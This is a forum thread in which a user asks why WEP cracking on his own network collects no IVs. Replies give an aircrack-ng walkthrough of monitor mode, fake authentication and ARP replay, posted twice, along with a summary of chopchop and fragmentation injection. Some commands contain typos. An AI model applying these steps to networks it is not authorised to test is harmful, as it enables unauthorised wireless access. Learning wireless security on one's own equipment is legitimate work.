Results 1 to 9 of 9

Thread: Question regarding WEP/WPA cracking

  1. #1
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11

    Default Question regarding WEP/WPA cracking

    Here is some background... I have cracked my own WEP key many times but this specific time it will not work... The problem i'm having is IV are not being collected. When I tried last time it only collected 1 IV.

    For the WPA aspect I guess I'm just looking for a good word list

  2. #2
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    5

    Default

    you need wireless traffic or injecting

  3. #3
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11

    Default

    well there were no clients on so i was going it clientless

  4. #4
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1

    Default

    If its WEP You can Crack it because it dosn't matter if its clientless...

    Here is How can u do it.... (I'll Explain it to you As if u had the Same Card i Have, Atheros [ath5k Driver] )

    First Check if Your card is at Monitor Mode

    In bt3:
    Code:
    airmon-ng stop ath0
    and again:
    Code:
    airmon-ng start wifi0
    ____
    IN bt4Same Deal different Name of the Device)
    Code:
    airmon-ng stop wlan1
    Code:
    airmong start wifi0
    _____
    Start ur Airodump and take note for the BSSID and ESSID Because you'll needed for Aireplay-ng..

    Lets Say that the transmits at ch6 (As if we already know, if now just run Airodump-ng and take a look)

    Code:
    airodump-ng -c 6 wlan1
    Then Open a new Konsole - Shell - Session and Run Aireplay with the following Comands(while doing this airodump-ng will need to be running)

    aireplay-ng -1 0 -e <ESSID> -e <BSSID> -h <Your Interface's BSSID> <Your Interface>

    [If you don't know whats ur interface's BSSID Execute this Command = macchanger <ur interface> -s (-s Stands for --show)

    Code:
    macchanged wlan1 -s
    Then Just Add ur BSSID to the Aireplay command =D

    Code:
    aireplay-ng -1 0 -e 2wire1231 -e 00:11:22:33:44:55 -h 11:22:33:44:55 wlan1
    The -1 Stands for the --Fake Authentication With AP Atk

    If Everything goes well, a message will Appear... Something like this:

    Code:
    Sending Authentication Request (Open System)[ACK]
    Authentication Successful
    Sending Association Request [ACK]
    Association successful :-)
    Then go back to Airodump-ng Stop it (ctrl + c) and Just add the option -w <nameofthefile> (write) so the command will end up like this:

    Code:
    airodump-ng -c 6 -w 2123 wlan1
    And Now its going to create a file with the APs... Then Start Aireplay-ng with the Standard ARP-Request REPLAY(-3)

    aireplay-ng -3 -b <BSSID> -h <YourBSSID> <Your Interface>


    Code:
    aireplay-ng -3 -b 00:11:22:33:44:55 -h 11:22:33:44:55 wlan1
    That will start reading the Packets, check Airodump and you'll see #DATA n° going up as if there was a connected Client.... now you only need to wait until 25k and use Aircrack

    Thats for WEP, for WPA U need to get a Handshake ( And i think this is already on the forum so Next time just Look First then Ask Later )

  5. #5
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by Rifts View Post
    well there were no clients on so i was going it clientless
    In which case you need wireless traffic or injecting.

    There are 10,000 tutorials on clientless wep hacking. There are also countless threads about wordlists.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  6. #6
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    19

    Default

    Please. Please, start with wep as the fundamentals are similar but more gratifying. Nothing helped me more than reading the man-pages for the aircrack suite. Specificly clientless injection.

    Use 1 aireplay-ng to fake auth. Then another aireplay-ng to run a chopchop or fragmentation attack. Then using the data from the attack packetforge-ng can be used to make an arp packet. Use that packet for injection with aireplay-ng and viola instant IV's.

    Go here and read what you need: hxxp://uuu.aircrack-ng.org/doku.php?id=tutorial (you know the drill, tt the xx's and www the uuu's until I get 15 posts)

    If you look around there long enough you may even find airoscript (beautifully lazy) which does this all for you. Please read and try the tutorials first so you understand what is going on behind the scenes if you find a script.

  7. #7
    Just burned his ISO
    Join Date
    Oct 2008
    Posts
    11

    Default yeah

    Quote Originally Posted by BanIvy View Post
    If its WEP You can Crack it because it dosn't matter if its clientless...

    Here is How can u do it.... (I'll Explain it to you As if u had the Same Card i Have, Atheros [ath5k Driver] )

    First Check if Your card is at Monitor Mode

    In bt3:
    Code:
    airmon-ng stop ath0
    and again:
    Code:
    airmon-ng start wifi0
    ____
    IN bt4Same Deal different Name of the Device)
    Code:
    airmon-ng stop wlan1
    Code:
    airmong start wifi0
    _____
    Start ur Airodump and take note for the BSSID and ESSID Because you'll needed for Aireplay-ng..

    Lets Say that the transmits at ch6 (As if we already know, if now just run Airodump-ng and take a look)

    Code:
    airodump-ng -c 6 wlan1
    Then Open a new Konsole - Shell - Session and Run Aireplay with the following Comands(while doing this airodump-ng will need to be running)

    aireplay-ng -1 0 -e <ESSID> -e <BSSID> -h <Your Interface's BSSID> <Your Interface>

    [If you don't know whats ur interface's BSSID Execute this Command = macchanger <ur interface> -s (-s Stands for --show)

    Code:
    macchanged wlan1 -s
    Then Just Add ur BSSID to the Aireplay command =D

    Code:
    aireplay-ng -1 0 -e 2wire1231 -e 00:11:22:33:44:55 -h 11:22:33:44:55 wlan1
    The -1 Stands for the --Fake Authentication With AP Atk

    If Everything goes well, a message will Appear... Something like this:

    Code:
    Sending Authentication Request (Open System)[ACK]
    Authentication Successful
    Sending Association Request [ACK]
    Association successful :-)
    Then go back to Airodump-ng Stop it (ctrl + c) and Just add the option -w <nameofthefile> (write) so the command will end up like this:

    Code:
    airodump-ng -c 6 -w 2123 wlan1
    And Now its going to create a file with the APs... Then Start Aireplay-ng with the Standard ARP-Request REPLAY(-3)

    aireplay-ng -3 -b <BSSID> -h <YourBSSID> <Your Interface>


    Code:
    aireplay-ng -3 -b 00:11:22:33:44:55 -h 11:22:33:44:55 wlan1
    That will start reading the Packets, check Airodump and you'll see #DATA n° going up as if there was a connected Client.... now you only need to wait until 25k and use Aircrack

    Thats for WEP, for WPA U need to get a Handshake ( And i think this is already on the forum so Next time just Look First then Ask Later )


    yeah see I have done this successfully MANY times but this specific time my data doesnt go up at all... i dont know what to do to get data packets

  8. #8
    Senior Member orange's Avatar
    Join Date
    Jan 2010
    Posts
    134

    Default

    yeah see I have done this successfully MANY times but this specific time my data doesnt go up at all... i dont know what to do to get data packets
    See, what BanIvy described is an ARP Request Replay Attack and this won't work if there are no clients connected. spasch in contrast already provided the right keywords: fragmentation and chopchop
    Please do some reading by yourself, the aircrack-ng wiki is an excellent resource of information - you just need to use it actually

  9. #9
    Junior Member SWFu64's Avatar
    Join Date
    Jan 2010
    Posts
    97

    Default

    Injection working correctly?
    "I do not know with what weapons World War III will be fought, but World War IV will be fought with sticks and stones."

    Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •